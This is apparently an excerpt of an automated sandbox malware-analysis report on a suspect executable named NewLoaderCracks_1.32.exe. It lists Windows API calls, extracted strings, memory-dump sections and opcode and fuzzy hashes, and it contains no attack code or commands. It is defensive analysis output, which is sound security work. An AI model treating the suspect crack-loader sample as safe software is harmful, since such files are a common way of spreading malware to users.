                  • Part of subcall function 005684DE: GetLastError.KERNEL32(00573958,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958,00573958), ref: 00568506
                • _free.LIBCMT ref: 0056BF3A
                • _free.LIBCMT ref: 0056BF4C
                • _free.LIBCMT ref: 0056BF5E
                • _free.LIBCMT ref: 0056BF70
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f3c4b9e34607d97dd54fe742c8eb03020e57e8e3b16c5f251850f2489d7a763a
                • Instruction ID: e3ddb1c6aa8e2ca4dedc05a2178c7df605325d607dc1a6004300005ef0b24116
                • Opcode Fuzzy Hash: f3c4b9e34607d97dd54fe742c8eb03020e57e8e3b16c5f251850f2489d7a763a
                • Instruction Fuzzy Hash: 7EF01232504301AB9A30EB65FECAC26FBD9BA547147644949F00CD7921CF30FCC59B54
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NewLoaderCracks_1.32.exe,00000104), ref: 005676FD
                • _free.LIBCMT ref: 005677C8
                • _free.LIBCMT ref: 005677D2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\NewLoaderCracks_1.32.exe
                • API String ID: 2506810119-1874295935
                • Opcode ID: 966e69ea36d02f2a0d5720d263e5d8a968508d3b0c2bf025082309607b52847b
                • Instruction ID: 2a1fcd972a83731b63fa5faae844893471f2593be5bd7b14f32fcba212cc80eb
                • Opcode Fuzzy Hash: 966e69ea36d02f2a0d5720d263e5d8a968508d3b0c2bf025082309607b52847b
                • Instruction Fuzzy Hash: 7731CE71A08619AFDB21DF99DC859AEBFFCFB99314F140066E80497200DA704E44DBA0
                APIs
                • __EH_prolog.LIBCMT ref: 00547579
                  • Part of subcall function 00543B3D: __EH_prolog.LIBCMT ref: 00543B42
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00547640
                  • Part of subcall function 00547BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00547C04
                  • Part of subcall function 00547BF5: GetLastError.KERNEL32 ref: 00547C4A
                  • Part of subcall function 00547BF5: CloseHandle.KERNEL32(?), ref: 00547C59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: a3976c7c8b7fc128870a083112071a998c9d033212419460de18b8b24a497629
                • Instruction ID: 4eb3d45be89c91fe3f63c6cf38fb883424920e9fb1f735bf11120a5eff02e172
                • Opcode Fuzzy Hash: a3976c7c8b7fc128870a083112071a998c9d033212419460de18b8b24a497629
                • Instruction Fuzzy Hash: 6C31D771908209AEEF10EB68DC09BEE7F79FF59358F004055F845A7191D7704A48D761
                APIs
                  • Part of subcall function 0054130B: GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                  • Part of subcall function 0054130B: SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                • EndDialog.USER32(?,00000001), ref: 0055A4B8
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0055A4CD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0055A4E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 43ac04f251b407abd470ee8e38be778b81c7b248e6fdc0e2d8c0fb7c6ef8ab52
                • Instruction ID: 543ed5dea570a9b77d1e895af06d99b893fdc5fb45853cd9b38a8fe4d227cb66
                • Opcode Fuzzy Hash: 43ac04f251b407abd470ee8e38be778b81c7b248e6fdc0e2d8c0fb7c6ef8ab52
                • Instruction Fuzzy Hash: 0111B432240200FFDE219FA89C5DF667FA9BB5B302F104612FA00960A1C7A19D09E727
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: 8811afb5b41bdc16f6355d3258527a4e438b50b1eee9e3eb201cfdbcabe2384d
                • Instruction ID: 0296e321d7c895be70f797a5606fb9b0b196183a9fc9ef8d567aeb1381182751
                • Opcode Fuzzy Hash: 8811afb5b41bdc16f6355d3258527a4e438b50b1eee9e3eb201cfdbcabe2384d
                • Instruction Fuzzy Hash: 76218E72444209ABDB21DEA4DC46FEE7FB8BF04304F044522FE1596192E3B1EA59EB61
                APIs
                • _swprintf.LIBCMT ref: 0054B51E
                  • Part of subcall function 0054400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0054401D
                • _wcschr.LIBVCRUNTIME ref: 0054B53C
                • _wcschr.LIBVCRUNTIME ref: 0054B54C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: 329e72a341e1ace22e7762de56634a42783774ead6b39b3d65adf4269c368fe7
                • Instruction ID: 5fb10b9f02d3572753c70adafc7fd95749ba276055114fd75efe844f2f428cf6
                • Opcode Fuzzy Hash: 329e72a341e1ace22e7762de56634a42783774ead6b39b3d65adf4269c368fe7
                • Instruction Fuzzy Hash: 5001DB7350431266A7205B759C86DEBFFACFED5360B544816F845C7041FB20D550C6A1
                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0054ABC5,00000008,?,00000000,?,0054CB88,?,00000000), ref: 005506F3
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0054ABC5,00000008,?,00000000,?,0054CB88,?,00000000), ref: 005506FD
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0054ABC5,00000008,?,00000000,?,0054CB88,?,00000000), ref: 0055070D
                Strings
                • Thread pool initialization failed., xrefs: 00550725
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: ad2d82161eeb4faa7c96eb50adcc13a274e4decd0225b9477990971690f496cf
                • Instruction ID: a36aa956013352129bb7e66ba2647884bfe7101a627fa406b8702981d69456be
                • Opcode Fuzzy Hash: ad2d82161eeb4faa7c96eb50adcc13a274e4decd0225b9477990971690f496cf
                • Instruction Fuzzy Hash: C111A0B1500709AFC3205F66D888AA7FFECFBA9755F10482EF5DA82240D6716988DB50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: 0931bb75a85ad819bc4d8890d07e8210f4911e318369325f4ddcdcf09ae8e9a2
                • Instruction ID: ac2210cdbbdc867a749377965eaa53522021e81ce14499aa74f1be470481c1da
                • Opcode Fuzzy Hash: 0931bb75a85ad819bc4d8890d07e8210f4911e318369325f4ddcdcf09ae8e9a2
                • Instruction Fuzzy Hash: 9E018C73600245AFDB218F58EC04A663FA9F724386B015822FC05A2230C7B19C5CFBB1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                • Instruction ID: f16f78c98e372346b62b207af15a640f757c09f89c8daab15d56003651be8ee4
                • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                • Instruction Fuzzy Hash: 06A15676A003869FEB25CF68C8917BEBFE9FF55310F18456EE8859B381C6389942C750
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,005480B7,?,?,?), ref: 0054A351
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,005480B7,?,?), ref: 0054A395
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,005480B7,?,?,?,?,?,?,?,?), ref: 0054A416
                • CloseHandle.KERNEL32(?,?,00000000,?,005480B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0054A41D
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 33848b8cca70f05c2831c732929790cab65cf2cb113a3f5b348fe146d71a3744
                • Instruction ID: c976ecb311e887f4a00d5499a9f8bf1ff5c617a60a340f2dff87449cec4e8219
                • Opcode Fuzzy Hash: 33848b8cca70f05c2831c732929790cab65cf2cb113a3f5b348fe146d71a3744
                • Instruction Fuzzy Hash: 2741CE712883816AE721DF24DC59BEEBBE8AB91708F040D1DB5D093181E6649A4CEB13
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,005689AD,?,00000000,?,00000001,?,?,00000001,005689AD,?), ref: 0056C0E6
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0056C16F
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,005667E2,?), ref: 0056C181
                • __freea.LIBCMT ref: 0056C18A
                  • Part of subcall function 00568518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0056C13D,00000000,?,005667E2,?,00000008,?,005689AD,?,?,?), ref: 0056854A
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: 3268c67e2ae6b2984d059a400ce0100f95e75b46b178160cc884aa0b03f65a3f
                • Instruction ID: fb802fe7f7ee180ca629a53fd7bb3a4eece9829927e9e9135c615a6b270a0cdb
                • Opcode Fuzzy Hash: 3268c67e2ae6b2984d059a400ce0100f95e75b46b178160cc884aa0b03f65a3f
                • Instruction Fuzzy Hash: 1D31CB72A0021AABDB248F64DC45DBE7FA5FB45710F044269FC09DB251EB35CD94DBA0
                APIs
                • GetDC.USER32(00000000), ref: 00559DBE
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00559DCD
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00559DDB
                • ReleaseDC.USER32(00000000,00000000), ref: 00559DE9
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 0e2f79ff26ccf06c8dce145eaf23bc6ae6199976fe547461c5d19123c05ca0f0
                • Instruction ID: 68a2257983781d76077b05671cd18e194b7fa529943beb3d7f2c8e44b610d545
                • Opcode Fuzzy Hash: 0e2f79ff26ccf06c8dce145eaf23bc6ae6199976fe547461c5d19123c05ca0f0
                • Instruction Fuzzy Hash: 49E0EC32985621A7D7201BA8AC0EB9B3F64FB2A713F054009FA05A61A0DB74440DEB90
                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00562016
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0056201B
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00562020
                  • Part of subcall function 0056310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0056311F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00562035
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction ID: 1daf62c2892e97e64444a5b11303095b6ff036ee973d93cdfca6606ecad8f032
                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction Fuzzy Hash: BEC04C34109E43D41E213AB2610E1BD0F003CE37E5F9274C6E88017183DE16570AD432
                APIs
                  • Part of subcall function 00559DF1: GetDC.USER32(00000000), ref: 00559DF5
                  • Part of subcall function 00559DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00559E00
                  • Part of subcall function 00559DF1: ReleaseDC.USER32(00000000,00000000), ref: 00559E0B
                • GetObjectW.GDI32(?,00000018,?), ref: 00559F8D
                  • Part of subcall function 0055A1E5: GetDC.USER32(00000000), ref: 0055A1EE
                  • Part of subcall function 0055A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0055A21D
                  • Part of subcall function 0055A1E5: ReleaseDC.USER32(00000000,?), ref: 0055A2B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: 2748d4e97e49b1fb4af2dccec62233788423a46a2f908df80eca951f42f1ae7d
                • Instruction ID: dab9b95d183b46fc6ca6375a9c85247edc9e18da88a94a3e5a4d3d498c31c2a0
                • Opcode Fuzzy Hash: 2748d4e97e49b1fb4af2dccec62233788423a46a2f908df80eca951f42f1ae7d
                • Instruction Fuzzy Hash: FB812575208604DFC714DF68D85892ABBE9FFD8711F00492EF98AD7260DB30AD09EB52
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: bd71f05304d79f8de3bb0a20d0df386016b7f0e3d0890c0683ee66381c8b010d
                • Instruction ID: ca5e64ea5751ea6cd9eee97f6d13cb23011eca52fa6390fdc0517fc932e8b7b5
                • Opcode Fuzzy Hash: bd71f05304d79f8de3bb0a20d0df386016b7f0e3d0890c0683ee66381c8b010d
                • Instruction Fuzzy Hash: 8451A43118CB41FAEA311A949C7BF367E69BB08B03F305D07BF8B648E1C69154986616
                APIs
                • _free.LIBCMT ref: 0056AA84
                  • Part of subcall function 00568849: IsProcessorFeaturePresent.KERNEL32(00000017,00568838,00000050,00573958,?,0054CFE0,00000004,00580EE8,?,?,00568845,00000000,00000000,00000000,00000000,00000000), ref: 0056884B
                  • Part of subcall function 00568849: GetCurrentProcess.KERNEL32(C0000417,00573958,00000050,00580EE8), ref: 0056886D
                  • Part of subcall function 00568849: TerminateProcess.KERNEL32(00000000), ref: 00568874
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
